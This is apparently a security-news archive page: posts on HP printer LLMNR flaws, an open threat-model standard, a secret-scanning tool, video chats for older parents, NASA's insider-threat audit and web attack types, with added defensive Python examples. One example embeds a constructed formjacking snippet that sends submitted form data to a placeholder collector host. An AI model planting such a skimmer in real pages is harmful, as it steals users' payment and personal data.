Category Archives: News

Vulnerabilities found in 250 HP printer models


HP has published several security alerts covering more than 250 of its printer models. According to the advisories, attackers could inject and execute malicious code, launch denial-of-service (DoS) attacks and access data. As a countermeasure, the manufacturer recommends firmware updates and configuration changes.

Entry point: the LLMNR protocol

The first vulnerability, CVE-2022-3942, is classified as critical, with a CVSS score of 8.4 (note that the CVSS v3 scale itself bands 7.0 to 8.9 as High and reserves Critical for 9.0 and above). According to Heise, attackers can use a flaw in the firmware's handling of LLMNR (Link-Local Multicast Name Resolution) to remotely trigger a buffer overflow in around 250 HP printer models, after which malicious code can be injected and executed.
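HP's alert recommends configuration changes alongside the firmware update. For a flaw reached through LLMNR, the obvious change is to switch the protocol off where the printer allows it, and then to confirm that nothing on the segment still answers LLMNR queries. The following is an added example (not HP's or Heise's code) that builds an RFC 4795 LLMNR query, parses the answers, and, when run on a live network, lists which addresses responded. The name queried at the bottom is a placeholder; LLMNR uses the DNS message format, so the parser is the familiar header plus question plus answer layout, including compression pointers.

```python
"""Build and parse LLMNR (RFC 4795) messages to find hosts that still answer
name resolution on UDP/5355.  Added example; not HP or Heise code."""
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # IPv4 link-scope multicast group from RFC 4795
LLMNR_PORT = 5355
QTYPE_A = 1
QCLASS_IN = 1


def encode_name(name: str) -> bytes:
    """DNS-style label encoding: length-prefixed labels ended by a zero byte."""
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError(f"bad label: {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_llmnr_query(name: str, txid: int = 0x1234) -> bytes:
    """Standard query: header with QDCOUNT=1 and every flag bit clear
    (QR=0, opcode=0, C=0, TC=0, T=0), followed by one A-record question."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    question = encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    return header + question


def decode_name(data: bytes, offset: int):
    """Decode a name at offset, following RFC 1035 compression pointers.
    Returns (name, offset just past the name in the original byte stream)."""
    labels, hops, end = [], 0, None
    while True:
        length = data[offset]
        if length == 0:
            offset += 1
            break
        if length & 0xC0 == 0xC0:            # two-byte pointer to an earlier name
            hops += 1
            if hops > 8:
                raise ValueError("compression pointer loop")
            if end is None:
                end = offset + 2
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            continue
        labels.append(data[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    return ".".join(labels), end if end is not None else offset


def parse_llmnr_response(data: bytes, expected_txid: int):
    """List of (name, ipv4) answers, or [] if this is not a response to our query."""
    if len(data) < 12:
        return []
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if txid != expected_txid or not flags & 0x8000:   # QR bit must be set
        return []
    offset = 12
    for _ in range(qd):                                # skip the echoed question(s)
        _, offset = decode_name(data, offset)
        offset += 4
    answers = []
    for _ in range(an):
        name, offset = decode_name(data, offset)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            answers.append((name, socket.inet_ntoa(rdata)))
    return answers


def probe(name: str, timeout: float = 1.0):
    """Send one query to the multicast group and collect (source, answers) pairs.
    Needs a real LAN; responders reply unicast to the querying socket."""
    txid = 0x4242
    found = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:
                data, (src, _port) = sock.recvfrom(1500)
                found.append((src, parse_llmnr_response(data, txid)))
        except socket.timeout:
            pass
    return found


if __name__ == "__main__":
    print(probe("NPI-PRINTER"))   # placeholder host name; use one from your network
```

A printer that answers here after the "configuration change" still has LLMNR enabled and is still reachable through the code path the advisory describes, whatever its firmware level.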


IriusRisk launches Open Threat Model standard to secure software development lifecycle


IriusRisk has launched a new Open Threat Model (OTM) standard to allow greater connectivity and interoperability between threat modeling and other parts of the software development lifecycle (SDLC). The OTM standard has been published under a Creative Commons license and provides a tool-agnostic way of describing a threat model in a format that is simple to use and understand, IriusRisk said.

The standard can take input from a wide range of source formats and supports new sources of application and system design, while also allowing users to exchange threat model data across the SDLC and the wider cybersecurity ecosystem. An accompanying API lets users submit an OTM file, which IriusRisk uses to build a full threat model with its rules engine and its library of components and risk patterns.
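What "tool-agnostic" buys you is that the model is just data, so it can be checked in CI like any other artifact. The following is an added example, not IriusRisk code: a small OTM document for a three-component portal, a referential-integrity check (every trust zone, threat and mitigation that is referenced must be defined), and a helper that lists the dataflows crossing a trust boundary, which is where a rules engine starts looking for threats. The field names follow the public OTM JSON layout as I understand it (otmVersion, project, trustZones, components, dataflows, threats, mitigations); verify them against the published schema before relying on them.

```python
"""Minimal Open Threat Model (OTM) document plus a referential-integrity check.
Added example; not IriusRisk's code or schema.  Field names follow the public
OTM JSON layout as I understand it and should be checked against the spec."""
import json

OTM_DOC = {
    "otmVersion": "0.1.0",
    "project": {"name": "Customer portal", "id": "customer-portal"},
    "trustZones": [
        {"id": "internet", "name": "Internet", "risk": {"trustRating": 1}},
        {"id": "private", "name": "Private network", "risk": {"trustRating": 100}},
    ],
    "components": [
        {"id": "browser", "name": "Browser", "type": "web-client",
         "parent": {"trustZone": "internet"}},
        {"id": "api", "name": "Portal API", "type": "web-service",
         "parent": {"trustZone": "private"},
         "threats": [{"threat": "T-001", "state": "mitigated",
                      "mitigations": [{"mitigation": "M-001", "state": "implemented"}]}]},
        {"id": "db", "name": "Orders database", "type": "postgresql",
         "parent": {"trustZone": "private"}},
    ],
    "dataflows": [
        {"id": "df-1", "name": "HTTPS requests", "source": "browser", "destination": "api"},
        {"id": "df-2", "name": "SQL over TLS", "source": "api", "destination": "db"},
    ],
    "threats": [
        {"id": "T-001", "name": "SQL injection through the order filter",
         "categories": ["Tampering"], "risk": {"likelihood": 70, "impact": 90}},
    ],
    "mitigations": [
        {"id": "M-001", "name": "Parameterised queries only", "riskReduction": 80},
    ],
}


def validate_otm(doc):
    """Return a list of problems; an empty list means every reference resolves."""
    problems = []
    zones = {z["id"] for z in doc.get("trustZones", [])}
    comps = {c["id"] for c in doc.get("components", [])}
    threats = {t["id"] for t in doc.get("threats", [])}
    mitigations = {m["id"] for m in doc.get("mitigations", [])}

    for c in doc.get("components", []):
        zone = c.get("parent", {}).get("trustZone")
        if zone not in zones:
            problems.append(f"component {c['id']} sits in unknown trust zone {zone!r}")
        for t in c.get("threats", []):
            if t.get("threat") not in threats:
                problems.append(f"component {c['id']} references unknown threat {t.get('threat')!r}")
            for m in t.get("mitigations", []):
                if m.get("mitigation") not in mitigations:
                    problems.append(f"threat {t.get('threat')} on {c['id']} references "
                                    f"unknown mitigation {m.get('mitigation')!r}")
    for df in doc.get("dataflows", []):
        for end in ("source", "destination"):
            if df.get(end) not in comps | zones:
                problems.append(f"dataflow {df['id']} {end} {df.get(end)!r} "
                                f"is not a known component or trust zone")
    return problems


def boundary_crossings(doc):
    """Ids of dataflows whose endpoints sit in different trust zones."""
    zone_of = {c["id"]: c.get("parent", {}).get("trustZone")
               for c in doc.get("components", [])}
    for z in doc.get("trustZones", []):
        zone_of[z["id"]] = z["id"]       # a zone used directly as an endpoint is its own zone
    return [df["id"] for df in doc.get("dataflows", [])
            if zone_of.get(df["source"]) != zone_of.get(df["destination"])]


def to_otm_json(doc):
    """Serialise in the form a threat-modelling tool or API would ingest."""
    return json.dumps(doc, indent=2)


if __name__ == "__main__":
    print(validate_otm(OTM_DOC), boundary_crossings(OTM_DOC))
```

The integrity check is the part worth wiring into a pipeline: a threat that points at a mitigation nobody defined is exactly the kind of gap that survives a hand-edited model.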


Comcast open-sources xGitGuard code protection tool


Comcast is releasing xGitGuard, a new software tool, as an open source project to the community at large. The tool is designed to proactively search public GitHub repositories for secrets and proprietary code that should never have been published there.

The idea behind xGitGuard is to provide an automated way of checking GitHub repositories for code that shouldn't be there, an important consideration for modern development teams given their increasing use of open source code and public hosting. The tool uses natural language processing (NLP), AI modelling and other techniques to programmatically identify and validate secrets (credentials, keys and similar) on GitHub, and to identify which developer accounts posted them.
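The two raw signals such tools build on are format patterns (many credential types have a recognisable prefix) and entropy (a real key looks random, a placeholder does not). The following is an added example, not xGitGuard's own code, which layers NLP and ML on top of signals like these: a scanner that applies both to a constructed source file. The key-like values in the sample are documentation placeholders, not live credentials, and the 3.5-bit entropy threshold is an assumption.

```python
"""Heuristic scan of source text for leaked secrets: pattern matches for known
credential formats plus a Shannon-entropy filter that drops placeholders.
Added example, not xGitGuard code; the sample source below is constructed."""
import math
import re

SAMPLE_SOURCE = """
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
aws_secret = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
github_token = "ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdef012345"
api_url = "https://api.example.com/v1/orders"
db_password = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
"""

# Specific formats first; the generic assignment rule catches the rest and is
# the only one the entropy filter is applied to.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36,}\b"),
    "assignment": re.compile(
        r"""(?i)(?:secret|token|password|api[_-]?key)\w*\s*[=:]\s*["']([^"']{16,})["']"""),
}


def shannon_entropy(value: str) -> float:
    """Bits per character: random base64 sits around 4.5 to 6, 'aaaa...' at 0."""
    if not value:
        return 0.0
    n = len(value)
    counts = {}
    for ch in value:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan(text: str, entropy_threshold: float = 3.5):
    """Findings as dicts with line, kind, value and entropy, one per secret."""
    findings, seen = [], set()
    for lineno, line in enumerate(text.splitlines(), 1):
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(line):
                value = m.group(1) if kind == "assignment" else m.group(0)
                if (lineno, value) in seen:
                    continue             # already reported under a more specific rule
                entropy = shannon_entropy(value)
                if kind == "assignment" and entropy < entropy_threshold:
                    continue             # placeholder or test value, not a real secret
                seen.add((lineno, value))
                findings.append({"line": lineno, "kind": kind,
                                 "value": value, "entropy": round(entropy, 2)})
    return findings


def redact(value: str) -> str:
    """Show just enough to locate the secret without republishing it."""
    return value[:4] + "..." + value[-4:] if len(value) > 12 else "*" * len(value)


def report(text: str):
    return [f"line {f['line']}: {f['kind']} (entropy {f['entropy']}) {redact(f['value'])}"
            for f in scan(text)]


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_SOURCE)))
```

Note what the entropy filter does and does not do: it silences the `db_password = "aaaa..."` placeholder, but the AWS and GitHub matches are reported regardless of entropy because their prefix alone is a strong signal. Validation against the issuing service, which the article says xGitGuard also does, is the step that separates a live credential from a revoked one.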


Helping Mom & Dad: Family Video Chats


Editor’s Note: This is the third in a series of articles about how we can help our elder parents get the most out of digital life—the ways we can help them look after their finances and health online, along with how they can use the internet to keep connected with friends and family, all safely and simply. 

Now here’s a great topic. Spending more quality time with our folks, even if they’re far away. That’s the beauty of a family video chat. It’s a way to connect with more than voice. It’s a way to share moments together. 

If your parents and the older loved ones in your family haven’t come around to the idea of video chats just yet, now’s a good time to give it a try. Video chats are far easier to enjoy than ever, and with a little initiative from you, the family can gather around a video chat rather quickly. In fact, there’s plenty you can do to get them started.  

Video chats may be old hat to you, but they're likely quite new to them

Clearly, a video chat is different than a phone call. Beyond the technological differences, it’s quite a different way of interacting. After all, there you are, face-to-face, talking over a device. And that may feel a little awkward, especially for our parents. They’ve lived lives where long-distance conversations meant using a phone that was anchored to the kitchen wall. 

So aside from the technical considerations of video chats, there's a degree of freedom that may leave our parents wondering what to do and how to act in this new medium. Just like when we first used video chat ourselves, questions come up: Where should I be looking on the screen? How should I hold the phone? Can everyone on this call see up my nose?

You can ease them in by taking the lead, welcoming them into the notion that your video chat can be much more than a phone call. More than simply talking, it’s a chance to create a shared space together.  

A great example is this: a co-worker recently told me about his in-laws who were scouting out retirement communities to live in. Even though his in-laws lived 2,000 miles away, they all got to do a little house-hunting together. Using a smartphone, they took room-to-room tours of model homes together, got views of the tree-lined streets, checked out the pools and rec centers, and so on. A few weeks later, they shared another video call where his in-laws walked the family through their new place after they’d settled in. And all of it started with a simple request, “Hey, turn on FaceTime so we can take a look too!” 

So, in a way, video chats truly are an opportunity to create moments together. It could be as simple as asking grandma to read a book to the kids, having mom and dad share what they're having for a birthday dinner, or asking them to show how hard it's snowing outside their home. Anything you can do to encourage a little free interaction of some sort may make a video chat feel far more comfortable. You can really relax and interact once you settle in and let the possibilities unfold.

Set a time for your call 

In a way, a video call is much like dropping by the house for a visit. Placing a video call unannounced may catch mom in her curlers, so to speak. Or, as we’ve heard our parents say when they looked at a messy living room, we may catch them when “the house isn’t ready for guests.” In either case, scheduling a time for a video call gives everyone time to prepare. Whether it’s sprucing up your appearance or simply getting into the headspace for a face-to-face interaction, a designated time helps everyone get ready. 

On your end, it's an opportunity for you to prepare as well. Do the kids have some recent schoolwork or a project they're proud of? Have them bring it for some show-and-tell. Doing some cooking lately and you just can't seem to get the family secret BBQ sauce just right? Bring your folks into the kitchen for some cooking advice. Find an old treasure in storage? Break it out and flip through your old grade-school art scrapbook with them on the call. As you prepare, think about the moments you'd like to share and some of the things you'd like to do together over a video call. That'll make it all the more special.

Picking a platform for your video call—smartphones and tablets are a straightforward way to go 

As you know, there are plenty of ways to hold a video call. There's a good chance you've used several platforms and apps yourself already, whether with friends, work, or a mix of both. So when it comes to picking what's best for your video call, the question to ask is what your parents' comfort level with technology is.

If your parents are pretty comfortable with technology, you can share one of my earlier articles on video calls with them, which walks through the ins and outs of different apps and options. If they’re a little less savvy with technology, ideally they have a smartphone or tablet that they can use. Chances are, that device will have video calling built right in, such as Apple’s FaceTime or Google Duo on Android devices—both of which make video calls an easier “point and shoot” experience.  

Even if you're using different devices, you can still use apps like FaceTime between Android phones and iPhones. It's rather straightforward, as all it takes is for one party or the other to click a link. Additionally, Google Duo is available as an app in Apple's App Store, which makes it easy for everyone to get on one platform as needed.

Video calls on laptops and computers 

If a smartphone or tablet isn’t in the picture, there are certainly options for laptops and computers, several you may also know well already. Of the free and relatively straightforward apps out there, you can choose from: 

Zoom

With a free account that can run through a browser window, you and your parents can enjoy a call without having to manually download an app. 

Skype

This comes standard on Windows PCs and supports apps for all kinds of tablets and smartphones too. If you want to create a video chat without an account, you can simply visit this page and start an instant video chat with a click.

Google Meet

Free to anyone with a free Google Gmail account, you can use Google Meet just by clicking its icon from your Google apps menu or by visiting https://meet.google.com/. Like Zoom and Skype, it can run in the window of a browser, so there’s no app to manually download. 

Of course, your folks will need a camera and microphone for their computer. If they don’t have one, there are plenty of moderately priced web cameras that include a microphone. I suggest getting one with a physical lens cap. That way they can protect privacy. Of course, they can always simply disconnect it when they’re not using it. 

Setting up a laptop or computer for video calls may take a little bit of work. You can help your parents by walking them through the process with these articles: 

If they have a Windows computer, you can check out this quick article to get the audio set up and this article for setting up the camera 
For Macs, check out this article for setting up audio and this article for setting up video. 

Keeping safe on your calls 

Once you’re all set up, here are a few things that you and your parents can do to help keep your calls private and secure.   

1) Set a password 

If your video chat app generates a link that others can click to join, be sure to set a password so that uninvited parties can't join as well. Also, don't be shy about asking your family members to use a password on the calls they initiate. It's pretty much standard practice nowadays.

2) Double-check any video chat invitation links 

Likewise, with any chat link that’s sent to you, be sure that link is legitimate. Confirm the link with the family member who sent it, particularly if you weren’t expecting one. (This is another good reason to schedule calls. Family members will be on the lookout for that link.) 
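The part of "is the link legitimate" that people get wrong is the host name: `zoom.us.evil.example` contains the words you expect but belongs to someone else, and `https://zoom.us@evil.example/` sends you to `evil.example`. The following is an added example, not McAfee code, that checks an invitation link the way a careful reader should, by comparing the real host name against a short list of services. The list itself is an assumption to adapt to the services your family uses.

```python
"""Check that a meeting invitation link points at the service it claims to.
Added example, not McAfee code; the allow-list is an assumption to adapt."""
from urllib.parse import urlsplit

# Assumed: the video-chat services this family uses.
TRUSTED_HOSTS = {
    "zoom.us": "Zoom",
    "meet.google.com": "Google Meet",
    "join.skype.com": "Skype",
    "facetime.apple.com": "FaceTime",
}


def classify_invite(url: str):
    """Service name for a trusted https invite link, or None for anything else."""
    parts = urlsplit(url.strip())
    if parts.scheme != "https" or not parts.hostname:
        return None
    host = parts.hostname.lower().rstrip(".")     # urlsplit drops any user@ prefix
    for trusted, service in TRUSTED_HOSTS.items():
        # exact host, or a genuine subdomain such as us02web.zoom.us;
        # a plain string-prefix test would also accept zoom.us.evil.example
        if host == trusted or host.endswith("." + trusted):
            return service
    return None


if __name__ == "__main__":
    for link in ("https://us02web.zoom.us/j/123456789",
                 "https://zoom.us.evil.example/j/123456789"):
        print(link, "->", classify_invite(link))
```

Scheduling the call still matters: a link that passes this check but arrives when no call was arranged deserves the phone call back that the paragraph above suggests.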

3) Use security software 

Make sure that you’re using comprehensive online protection software that helps steer you clear of scam emails and links, along with browser protection that blocks links that could send you to sketchy websites. That way, if you do get sent a bogus invite link from a scammer, you’ll be protected. 

4) Keep your apps and operating system up to date 

Aside from giving you the latest features and functionality, updates also often include essential security improvements. Set your computer to update itself automatically and consider using security software that will scan for vulnerabilities and install updates automatically as needed. 

Chat it up! 

An interesting closing note is that getting comfortable with video chat may open a world of other possibilities as well. Perhaps once they get online and see how video chats work, they'll reach out to other friends and get them in on it too, creating more opportunities to reach out and spend time with others. In other words, you may really start something here by getting mom and dad on video chat.

Additionally, early research has shown that older adults who regularly use technologies like video chat have seen positive impacts on their long-term memory compared to those who interacted only over the phone or in person. Similarly, research has shown that the use of technology in general can enhance mental health for older adults as well.

With that, I hope you’ll give it a try with your parents and older loved ones. Meet the inevitable technical bumps in the road with a smile because this journey will be absolutely worth it. For all of you. 

The post Helping Mom & Dad: Family Video Chats appeared first on McAfee Blog.


NASA’s Insider Threat Program


The Office of Inspector General has audited NASA’s insider threat program:

While NASA has a fully operational insider threat program for its classified systems, the vast majority of the Agency’s information technology (IT) systems — including many containing high-value assets or critical infrastructure — are unclassified and are therefore not covered by its current insider threat program. Consequently, the Agency may be facing a higher-than-necessary risk to its unclassified systems and data. While NASA’s exclusion of unclassified systems from its insider threat program is common among federal agencies, adding those systems to a multi-faceted security program could provide an additional level of maturity to the program and better protect agency resources. According to Agency officials, expanding the insider threat program to unclassified systems would benefit the Agency’s cybersecurity posture if incremental improvements, such as focusing on IT systems and people at the most risk, were implemented. However, on-going concerns including staffing challenges, technology resource limitations, and lack of funding to support such an expansion would need to be addressed prior to enhancing the existing program.

Further amplifying the complexities of insider threats are the cross-discipline challenges surrounding cybersecurity expertise. At NASA, responsibilities for unclassified systems are largely shared between the Office of Protective Services and the Office of the Chief Information Officer. In addition, Agency contracts are managed by the Office of Procurement while grants and cooperative agreements are managed by the Office of the Chief Financial Officer. Nonetheless, in our view, mitigating the risk of an insider threat is a team sport in which a comprehensive insider threat risk assessment would allow the Agency to gather key information on weak spots or gaps in administrative processes and cybersecurity. At a time when there is growing concern about the continuing threats of foreign influence, taking the proactive step to conduct a risk assessment to evaluate NASA’s unclassified systems ensures that gaps cannot be exploited in ways that undermine the Agency’s ability to carry out its mission.


10 Things cybercriminals love about you


10 Ways organizations make attacks easy

What do cybercriminals love? (Mostly themselves, but that is beside the point.) They love organizations that have unmitigated risks in their web applications and application programming interfaces (APIs). With the entire world connected via the internet, the easiest and quickest way for threat actors to infiltrate your systems or steal customer data is through web applications. Basically, everything from the code used to build the application, to the APIs used to connect things, to configuration and authentication is fair game.

The top 10 web application security risks cybercriminals love

The areas most often targeted for attack can vary and may change frequently as cybercriminals invent newer and stealthier ways to worm their way into systems. According to OWASP, the 2021 Top 10 Web Application Security Risks are:

Broken Access Control
Cryptographic Failures (previously Sensitive Data Exposure)
Injection (which now includes Cross-site Scripting)
Insecure Design
Security Misconfiguration
Vulnerable and Outdated Components
Identification and Authentication Failures
Software and Data Integrity Failures
Security Logging and Monitoring Failures
Server-Side Request Forgery

Most common attack types

Based on the risks listed above, criminals are most likely to employ the following attack types in their bid to infiltrate systems or steal sensitive customer credentials:

Client-side attacks (data breaches and credential compromise)

Client-side attacks include formjacking, credit card skimming, and Magecart attacks. Cybercriminals use client-side attacks to steal information directly from customers or other website users as they input information into websites. Stolen data includes credit card information and personally identifiable information (PII).

Supply chain attacks (JavaScript and software)

According to recent research, supply chain attacks surged by more than 650% over the last year. Threat actors are leveraging existing vulnerabilities in open-source and third-party code or injecting their own malicious scripts into software and JavaScript code to conduct hostile attacks against organizations and industries connected via the supply chain.
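The client-side and supply-chain cases above share a mechanism: a script the page trusts is changed after the developer last looked at it. Subresource Integrity (SRI) is the browser-side control for the static case, and it is the one a developer can apply today. The following is an added example, not Feroot or AT&T code, that computes the integrity value for a known-good script, emits the tag that pins it, and shows that a copy with a formjacking payload appended no longer verifies. Both script bodies are constructed.

```python
"""Pin a third-party script with Subresource Integrity: compute the integrity
value for a known-good body, emit the <script> tag, and verify a later copy so
that a tampered file (CDN compromise, skimmer appended) is refused by the
browser.  Added example, not Feroot or AT&T code; script bodies are constructed."""
import base64
import hashlib
import hmac

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")   # the only digests SRI allows

# Constructed: the checkout helper as the site expects it...
ORIGINAL_SCRIPT = b"window.checkout = function (form) { return form.submit(); };\n"
# ...and the same file with a formjacking payload appended that copies every
# submitted form to an attacker-controlled collector.
TAMPERED_SCRIPT = ORIGINAL_SCRIPT + (
    b"document.addEventListener('submit', function (e) {\n"
    b"  fetch('https://collector.invalid/', {method: 'POST', body: new FormData(e.target)});\n"
    b"});\n"
)


def sri_integrity(body: bytes, algo: str = "sha384") -> str:
    """'<algo>-<base64 digest>', the value of the HTML integrity attribute."""
    if algo not in SRI_ALGORITHMS:
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(body: bytes, integrity: str) -> bool:
    """True if the body matches any algorithm/digest pair in the attribute.
    Browsers use the strongest listed algorithm; any match is accepted here."""
    for token in integrity.split():
        algo, _, _digest = token.partition("-")
        if algo in SRI_ALGORITHMS and hmac.compare_digest(
                sri_integrity(body, algo).encode(), token.encode()):
            return True
    return False


def script_tag(src: str, body: bytes) -> str:
    """The tag to ship; crossorigin is required for SRI on cross-origin scripts."""
    return (f'<script src="{src}" integrity="{sri_integrity(body)}" '
            f'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    pinned = sri_integrity(ORIGINAL_SCRIPT)
    print(script_tag("https://cdn.example/checkout.js", ORIGINAL_SCRIPT))
    print("original verifies:", sri_matches(ORIGINAL_SCRIPT, pinned))
    print("tampered verifies:", sri_matches(TAMPERED_SCRIPT, pinned))
```

The caveat is the reason runtime monitoring products exist at all: SRI only works for a script whose bytes never change, so a third-party tag that legitimately updates itself cannot be pinned, and a skimmer injected inline into the first-party page is outside SRI's reach entirely. Those cases need a Content Security Policy and the kind of behavioural monitoring described further down.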

Vulnerable application attacks (Unpatched bugs/vulnerabilities and legacy applications)

New bugs and vulnerabilities are discovered on a daily basis, and cybercriminals love to exploit them. Equally, criminals are attracted to legacy applications that may contain unpatchable vulnerabilities. Sometimes attackers discover the vulnerabilities before security researchers do, and these 'zero days' enable application and system compromise, often without the organization even knowing it has been attacked. Common attack types that target vulnerabilities include cross-site scripting and injection (JavaScript, SQL, CSS and HTML).

Automated attacks (Bots and DDoS)

Threat actors use automated techniques, such as botnets and distributed denial of service (DDoS), for attacks that include credential stuffing, content scraping, ticket/product scalping, gift card abuse and business interruption.
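Of the automated attacks listed, credential stuffing is the one with a clear signature in ordinary authentication logs: one source trying many different usernames in a short window, mostly failing, with the occasional success marking an account whose reused password worked. The following is an added example, not Feroot or AT&T code, that runs that rule over a handful of constructed log lines in a made-up key=value format; the window and thresholds are assumptions to tune per site.

```python
"""Spot credential stuffing in authentication logs.  Added example, not Feroot
or AT&T code; the log lines are constructed and the thresholds are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one stuffing run, one ordinary retry, one normal login.
LOG_LINES = """\
2024-03-01T10:00:01Z ip=203.0.113.5 user=alice result=fail
2024-03-01T10:00:02Z ip=203.0.113.5 user=bob result=fail
2024-03-01T10:00:02Z ip=203.0.113.5 user=carol result=fail
2024-03-01T10:00:03Z ip=203.0.113.5 user=dave result=fail
2024-03-01T10:00:03Z ip=203.0.113.5 user=erin result=success
2024-03-01T10:00:04Z ip=203.0.113.5 user=frank result=fail
2024-03-01T10:00:10Z ip=198.51.100.7 user=grace result=fail
2024-03-01T10:00:11Z ip=198.51.100.7 user=grace result=fail
2024-03-01T10:00:12Z ip=198.51.100.7 user=grace result=success
2024-03-01T10:05:00Z ip=192.0.2.9 user=heidi result=success
""".splitlines()

LINE_RE = re.compile(r"^(\S+) ip=(\S+) user=(\S+) result=(\S+)$")


def parse_line(line: str):
    """(timestamp, ip, user, result), or None for lines in another format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
    return ts, m.group(2), m.group(3), m.group(4)


def detect_credential_stuffing(lines, window=timedelta(minutes=1),
                               min_users=5, min_fail_ratio=0.8):
    """Per source IP, slide a time window over its attempts and alert when it
    holds at least min_users distinct usernames and mostly failures.  One user
    with many failures is plain brute force and is deliberately not flagged
    here; that needs a per-account rule instead."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec[1]].append(rec)
    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort()
        start = 0
        for end in range(len(recs)):
            while recs[end][0] - recs[start][0] > window:
                start += 1
            span = recs[start:end + 1]
            users = {r[2] for r in span}
            failures = sum(1 for r in span if r[3] != "success")
            if len(users) >= min_users and failures / len(span) >= min_fail_ratio:
                alerts[ip] = {
                    "distinct_users": len(users),
                    "attempts": len(span),
                    "failures": failures,
                    "compromised": sorted(r[2] for r in span if r[3] == "success"),
                }
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_credential_stuffing(LOG_LINES).items():
        print(ip, alert)
```

The `compromised` list is the operationally useful output: those are the accounts to lock and reset, while the source address itself is usually disposable and changes with the next botnet node.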

Protect your organization from the risks and attacks that cybercriminals love

There are purpose-built solutions that safeguard organizations, consumers and internet users from the very things that criminals love to use to their advantage. Two tools from Feroot that are part of the AT&T Managed Vulnerability Program provide client-side application security. These tools are:

Feroot Security PageGuard—Based on the Zero Trust model, PageGuard runs continuously in the background to automatically detect the types of unauthorized scripts and anomalous code behavior found in client-side, application, supply chain and automated attack types. If threats are detected, PageGuard blocks all unauthorized and unwanted behavior in real-time across the organization. PageGuard also automatically applies security configurations and permissions for continuous monitoring of and protection from malicious client-side activities and third-party scripts.

Feroot Security Inspector—In just seconds, Inspector automatically discovers all web assets a company utilizes and reports on their data access. Inspector finds all security vulnerabilities on the client-side and provides specific client-side threat remediation advice to application developers and security teams in real-time.

Next steps

Modern web applications are useful, but they can carry potentially dangerous vulnerabilities and bugs. Protect your customers and your websites and applications from client-side security threats, such as Magecart and script attacks, with security tools like Feroot's Inspector and PageGuard. As offered through AT&T's Managed Vulnerability Program (MVP), these services allow the MVP team to inspect and monitor customer web applications for malicious JavaScript code that could jeopardize customer and organization security.
